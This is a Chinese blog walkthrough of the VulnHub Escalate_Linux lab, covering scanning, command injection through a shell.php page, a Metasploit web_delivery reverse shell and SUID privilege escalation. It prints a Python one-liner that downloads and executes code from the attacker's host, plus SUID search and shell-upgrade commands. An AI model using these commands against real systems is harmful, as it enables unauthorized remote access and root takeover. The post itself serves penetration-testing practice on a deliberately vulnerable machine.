记录一次VulnHub 靶场——Escalate_Linux的渗透测试过程

已于 2024-03-07 17:18:49 修改
阅读量881 收藏 25
点赞数 16
分类专栏: # VulnHub靶场之路 文章标签: 安全 运维 web安全
于 2024-03-07 17:17:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50377269/article/details/136539677
版权

目录

0x00 靶场环境搭建

0x01 靶机信息收集

0x02 渗透测试

0x03 靶机提权

0x00 靶场环境搭建

链接:百度网盘 请输入提取码

提取码:nz02

下载完成之后导入vmware或者virtualBox,网卡改为nat模式或仅主机模式(方便信息收集)

0x01 靶机信息收集

通过kali linux扫描本网段发现靶机IP地址

Kali Linux:192.168.94.207

靶机IP地址:192.168.94.212

发现靶机IP之后,直接上Nmap扫描!发现靶机开放了80、111、139、445、2049nfs几个端口

访问靶机80端口之后没发现有什么可利用的信息,于是直接上dirsearch搜索到一个shell.php文件

访问shell.php文件发现有一串提示,通过翻译后得知可以将cmd作为GET参数传递

那么由此我们可以上传一个shell进行反弹回来。

0x02 渗透测试

打开msfconsole控制台使用web_delivery漏洞攻击模块

"web_delivery"漏洞通常指的是通过利用Web应用程序中的漏洞来交付恶意软件或者进行攻击。这种类型的漏洞可能会允许攻击者向受害者的计算机或系统交付恶意软件,或者执行恶意代码

查看目标类型,默认为Python类型,所以我们也可以使用传参来查看靶机存不存在Python环境

靶机存在Python环境,那么我们生成Python环境的反弹shell命令,

"SRVHOST" 通常是指在渗透测试或网络安全领域中使用的一个参数或变量,代表服务主机的 IP 地址或主机名。在一些渗透测试工具(比如 Metasploit)或网络安全工具中,可以通过设置 SRVHOST 来指定服务监听的主机地址。

例如,在使用 Metasploit 搭建一个反向 Shell 的时候,你可能需要指定 SRVHOST 参数来告诉 Metasploit 监听连接的主机地址。这样做可以确保服务只接受来自指定主机的连接请求,而不会接受其他主机的连接

这里得将反弹shell的命令进行url编码,然后使用cmd传参靶机才能接收执行此命令!

python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.94.207:8080/NmuALiAL7XOs', context=ssl._create_unverified_context());exec(r.read());"

这里我使用burpsuite进行url编码

使用cmd进行传参,返回kali中弹回了一个session,直接连接这个session得到shell

0x03 靶机提权

又到了经典的提权环节了,我们这里可以先使用Python实现交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

这里我们可以了解一个知识点:SUID

SUID(Set User ID)是一种用于提升程序权限的特殊权限位。当一个可执行文件的 SUID 位被设置时,该程序将以文件所有者的权限来执行,而不是执行该程序的用户的权限。

SUID 权限通常用于需要以特定用户权限执行的程序,比如一些系统命令或管理工具。例如,passwd 命令通常具有 SUID 权限,因为它需要修改系统密码文件,这是普通用户无法直接操作的。通过 SUID 权限,普通用户可以执行 passwd 命令来修改自己的密码,而无需获取 root 权限。然而,SUID 权限也带来了安全风险,因为恶意用户可能会利用具有 SUID 权限的程序来进行特权提升或执行其他恶意操作。因此,系统管理员需要谨慎地管理具有 SUID 权限的程序,并确保它们没有潜在的安全漏洞。

SUID是一种对二进制程序进行设置的特殊权限,可以让二进制程序的执行者临时拥有属主的权限

当s这个标志出现在文件所有者的x权限上时,如/usr/bin/passwd这个文件的权限状态:“-rwsr-xr-x.”,此时就被称为Set UID,简称为SUID。那么这个特殊权限的特殊性的作用是什么呢?

1、SUID权限仅对二进制程序(binary program)有效;

2、执行者对于该程序需要具有x的可执行权限;

3、本权限仅在执行该程序的过程中有效(run-time);

4、执行者将具有该程序拥有者(owner)的权限。

以下语句可以用来搜索具备SUID权限的程序

find / -perm -u=s -type f 2>/dev/null


find / -user root -perm -4000 -exec ls -ldb {} ;


find / -user root -perm -4000 -print 2>/dev/null

接下来我们可以使用命令来查找具有suid权限的可执行文件,发现在/home/user3目录存在一个shell,进行此目录查看权限发现存在s标志出现在x权限上面,那么我们可以确定这个文件可以进行提权。

运行此shell执行文件,成功提权到root权限

旺仔Sec
关注
  • 16
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Escalate_Linux靶机详解(1)
苏生要努力
02-21 546
name=xiao&pwd=123456如果你的value字符串包含了=或者&,那么势必会造成接收U川的服务器解析错误,因此必须将引起歧义的&和=符号进行转义,也就是对其进行编码。背景:目标系统存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,. 但不想在目标设备硬盘上留下任何webshell文件信息 (2)利用nc或python的方法反弹shell不好使用 解决思路:让目标设备从远端服务器加载webshell代码至内存执行。获得meterpreter。使用BP进行url编码。
【靶机渗透】Escalate_Linux靶机渗透练习+12种提权方式
serendipity1130的博客
08-31 4205
注:这个靶机主要用来练习Linux提权,有超过12种的提权方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.提示:
Escalate_Linux靶机提权渗透测试
末班车的博客
03-10 691
使用Escalate_Linux靶机,学习多种提权方法
Linux Polkit权限提升漏洞复现(CVE-2021-4034)
weixin_45945976的博客
01-26 7532
Linux Polkit权限提升漏洞 CVE-2021-4034 漏洞描述 Qualys 研究团队在 polkit 的 pkexec 发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置利用此漏洞来获得易受攻击主机上的完全 root 权限。 漏洞影响 Polkit > 2009 漏洞复现 from ctypes import * from ctypes.util import find_library impo
escalate靶机为例学习linux的提权方式-linux提权学习笔记(1)
zr1213159840的博客
06-25 2947
linux11种提权方式总结
Kali Linux Intrusion and Exploitation Cookbook
04-26
Kali Linux Intrusion and Exploitation Cookbook by Dhruv Shah English | 21 Apr. 2017 | ASIN: B071V5BWYZ | 512 Pages | AZW3 | 37.35 MB Over 70 recipes for system administrators or DevOps to master Kali...
Advanced Penetration Testing
08-22
此书是英文版《渗透测试高手:打造固若金汤的安全网络》。 《Advanced Penetration Testing: Hacking the World's Most Secure Networks》 Build a better defense against motivated, organized, professional ...
escalate:纯OCamlDeflate算法的实现
06-02
DEFLATE 流可以是许多容器的一部分。 计划实施最常见的那些。 容器支持 部分地 ZLIB 是的 邮编 不 压缩 不 安装 你想试试吗? 酷,这是构建说明。 充其量你通过获得你的 OCaml 。 最终,一旦这个库成熟,它也可以...
srcqe_analysis:EIC的短程相关准弹性分析
03-21
独立插件示例在ifarm上运行source /group/eic/escalate/env.sh要运行python示例,请编辑run_g4e.py(文件名等)并运行# G4Epython3 run_g4e.py# Analysispython3 run_plugin.py要从命令行运行插件: ejana-Pplugins=...
ESCALATE:ESCALATE(实验规范,捕获和实验室自动化技术)一种本体论框架和开源软件包,为人类和机器可读的实验规范,全面和可扩展的(元)数据捕获以及结构化数据报告提供了抽象层
04-02
ESCALATE(实验规范,捕获和实验室自动化技术)—本体论框架和开源软件包为人类和机器可读的实验规范,全面和可扩展的(元)数据捕获以及结构化数据报告提供了一个抽象层。 作者 另请参阅参与此项目的列表。 执照 此...
No.40-VulnHub-Escalate_Linux: 1-Walkthrough渗透学习
qq_34801745的博客
02-02 1650
** VulnHub-Escalate_Linux: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/escalate_linux-1,323/ 靶机难度:级(CTF) 靶机发布日期:2019年6月30日 靶机描述: Escalate_Linux-一种有意开发的易受攻击的Linux虚拟机。该计算机的主要重点是学习Linux Post Exp...
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 643
轻量部署,安全和业务连续性才能两不误
内网安全:IPC横向
8888的博客
07-23 659
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 247
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
从等保测评看行业安全趋势:洞察与预测
A526847的博客
07-23 656
从等保1.0到等保2.0,我们看到了保护范围的扩展、综合防御体系的构建、定级灵活性的增强以及定级流程的严格化。未来,随着新技术的不断涌现,等保测评的标准和方法还将继续更新和完善。云计算、物联网、大数据等新兴领域的发展,为等保测评提供了新的应用场景。因此,等保测评需要面向这些新兴领域,制定专门的测评标准和方法,确保其安全性得到有效保障。企业需要组建专业的测评团队,并对其进行必要的培训,以确保测评的准确性和有效性。等保测评将更加注重对新技术的评估和应用,确保新技术在提升系统安全性的同时,不会带来新的安全隐患。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 542
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
图像识别技术的伦理与法规考量:保障隐私与安全
matlabgoodboy的博客
07-23 574
作为计算机视觉领域的重要应用,其在多个领域如安全监控、医疗诊断、人脸识别等方面展现出巨大的潜力。然而,随着技术的广泛应用,其伦理与法规考量,尤其是隐私与安全问题,日益受到关注。以下从隐私保护、数据安全、技术偏见与歧视、以及法规监管等几个方面进行详细探讨。
充电桩浪涌保护方案—保障充电设施安全稳定运行的关键
最新发布
Leiditech_的博客
07-24 833
大功率TVS二极管则以其极快的响应速度(纳秒级)和精准的电压钳位能力,对残余的浪涌进行进一步抑制,确保后端电路的安全。然而,由于其复杂的电气环境和暴露于户外的特点,充电桩容易受到浪涌的影响。浪涌可能来自雷电、电网故障、大功率设备的启停等,对充电桩的电子设备和储能系统造成严重损害。它具有超强的浪涌吸收能力和抑制电压能力,在实际应用通常并接在电路,既能解决雷击大浪涌问题,又能对静电起到超强的防护效果。3. 设备启停:大功率设备(如电动机、变压器等)的启动和停止会引起线路的电流和电压突变,产生浪涌。
linux CVE-2016-2183)
08-25
CVE-2016-2183 is a vulnerability that was found in the Linux kernel. This vulnerability allows local users to gain root privileges by leveraging a race condition in the keyring implementation. By ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旺仔Sec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值